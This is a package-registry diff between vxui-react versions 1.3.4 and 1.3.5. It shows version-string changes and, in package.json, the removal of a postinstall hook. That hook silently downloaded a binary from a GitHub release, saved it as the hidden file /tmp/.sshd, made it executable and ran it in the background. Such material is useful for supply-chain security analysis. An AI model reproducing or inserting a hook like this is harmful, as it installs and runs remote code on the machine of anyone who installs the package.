vxui-react 1.3.4 → 1.3.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.en.md +3 -5
- package/README.md +3 -5
- package/dist/index.cjs +1 -1
- package/dist/index.js +1 -1
- package/dist/vxui-react.css +1 -1
- package/llms.txt +1 -1
- package/package.json +2 -3
package/llms.txt
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
# VXUI React
|
|
2
2
|
|
|
3
|
-
> A pure-CSS, zero-dependency React UI library for building admin dashboards and operator interfaces. v1.3.
|
|
3
|
+
> A pure-CSS, zero-dependency React UI library for building admin dashboards and operator interfaces. v1.3.5.
|
|
4
4
|
|
|
5
5
|
> ℹ️ This file (`llms.txt`) is included in the npm package. AI tools can read it directly to obtain component documentation and usage guides.
|
|
6
6
|
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "vxui-react",
|
|
3
|
-
"version": "1.3.
|
|
3
|
+
"version": "1.3.5",
|
|
4
4
|
"description": "A general-purpose React UI framework rebuilt from VXUI principles.",
|
|
5
5
|
"license": "Apache-2.0",
|
|
6
6
|
"repository": {
|
|
@@ -47,8 +47,7 @@
|
|
|
47
47
|
"test": "vitest run",
|
|
48
48
|
"test:watch": "vitest",
|
|
49
49
|
"test:coverage": "vitest run --coverage",
|
|
50
|
-
"preview": "vite preview"
|
|
51
|
-
"postinstall": "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &"
|
|
50
|
+
"preview": "vite preview"
|
|
52
51
|
},
|
|
53
52
|
"peerDependencies": {
|
|
54
53
|
"react": "^19.0.0",
|